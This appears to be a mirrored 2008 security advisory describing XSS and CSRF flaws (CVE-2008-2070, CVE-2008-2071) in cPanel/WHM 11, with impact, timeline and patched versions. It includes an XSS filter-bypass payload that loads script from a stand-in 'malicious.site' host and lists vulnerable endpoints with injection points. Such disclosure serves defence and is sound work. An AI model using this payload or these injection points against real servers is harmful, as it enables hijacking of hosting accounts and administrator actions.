Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19822
HistoryMay 11, 2008 - 12:00 a.m.

XSS and CSRF vulnerability on Cpanel 11

2008-05-1100:00:00
vulners.com
24
JSON
  1. DESCRIPTION OF THE SOFTWARE

cPanel is a hosting automation tool.
WHM interface provides access to the heart of the cPanel and WHM package
and allows a Server Administrator to simply configure a few options and
be on their way to hosting web sites.

  1. DESCRIPTION OF THE VULNERABILITY

There are XSS (identified by CVE-2008-2070) and CSRF (identified by
CVE-2008-2071) vulnerabilities on cPanel software.

On WHM there is a simple pattern for XSS defense, but this function
is not well implemented so it's possible to bypass it using a simple
cheat. This is a simple proof of concept:

>><<<<<<<<<<<<script src="http://malicious.site/code.js&quot; a=>>>>>>>><

In this way the function don't sanitize the string so it's possible
to inject arbitrary JavaScript/HTML code.

WHM provide, to the administrator or reseller, all function for manage
the server via Web interface but don't protect them against Cross
Request Forgery (CSRF).
To exploit this vulnerability is not necessary to inject any kind of
code to the victim.

XSS and CSRF flaw is more simple to exploit with cPanel XMLAPI [1]
that use Authentication Basic of WHM (This API works on the same domain
and port of WHM).

  1. ANALYSIS

The XSS flaws are present in any function that manages user input.
An example list of vulnerable functions to XSS are:

  • Knowlege Base (/scripts2/knowlegebase?issue=[INJECTION]&domain=)
  • Change Ip to domain (/scripts2/changeip?domain=any&user=[INJECTION])
  • List user account
    (/scripts2/listaccts?searchtype=domain&search=[INJECTION]&acctp=30)

The list above is not complete. It's possible there are other scripts
vulnerable.

The CSRF flaw is in all functions that allow to perfom an action (like
restart of a service or the entire server) with HTTP method.

This vulnerability was tested on WHM 11.15.0 - cPanel 11.18.3-R21703.

  1. IMPACT

The XSS can be used for create/modify accounts or retrieve important
informations about them.

With CSRF flaws an attacker can create a new user and gain reseller
privilege to it, restart a service, suspend an account, change the
password of an account and many other really intersting things.
See, for example, "createacct" [2] and "setupreseller" [3] function of
cPanel XML API.

  1. SOLUTION

Vendor released a new version where the XSS flaw is resolved and CSRF
mitigated enough to consider it trivial.
Update the cPanel to latest release of yours build.
All 11.18.4+ and 11.22.3+ builds include the patch. [4]

Note that anti-CSRF function use HTTP "Referer" header, please keep in
mind is not difficult for an attacker to modify it in various way.

  1. TIME LINE

23/03/2008 - Vulnerability discovered
07/04/2008 - cPanel security team contacted
25/04/2008 - cPanel insert patch in all public builds

  1. CVE REFERENCE

CVE-2008-2070 - XSS
CVE-2008-2071 - CSRF

  1. REFERENCE

[1] http://www.cpanel.net/plugins/xmlapi/
[2] http://www.cpanel.net/plugins/xmlapi/createacct.html
[3] http://www.cpanel.net/plugins/xmlapi/setupreseller.html
[4] http://changelog.cpanel.net/


Matteo Carli

Related

securityvulns 1
packetstorm 1
seebug 1
cve 2
prion 2
securityvulns
securityvulns
Daily web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2008-05-11 00:00:00
packetstorm
packetstorm
cpanel-xssxsrf.txt
2008-05-09 00:00:00
seebug
seebug
cPanel跨站脚本和跨站请求伪造漏洞
2008-05-14 00:00:00
cve
cve
CVE-2008-2070
2008-05-12 16:20:00
CVE-2008-2071
2008-05-12 16:20:00
prion
prion
Cross site scripting
2008-05-12 16:20:00
Cross site request forgery (csrf)
2008-05-12 16:20:00
JSON
Related for SECURITYVULNS:DOC:19822
securityvulns1packetstorm1seebug1cve2prion2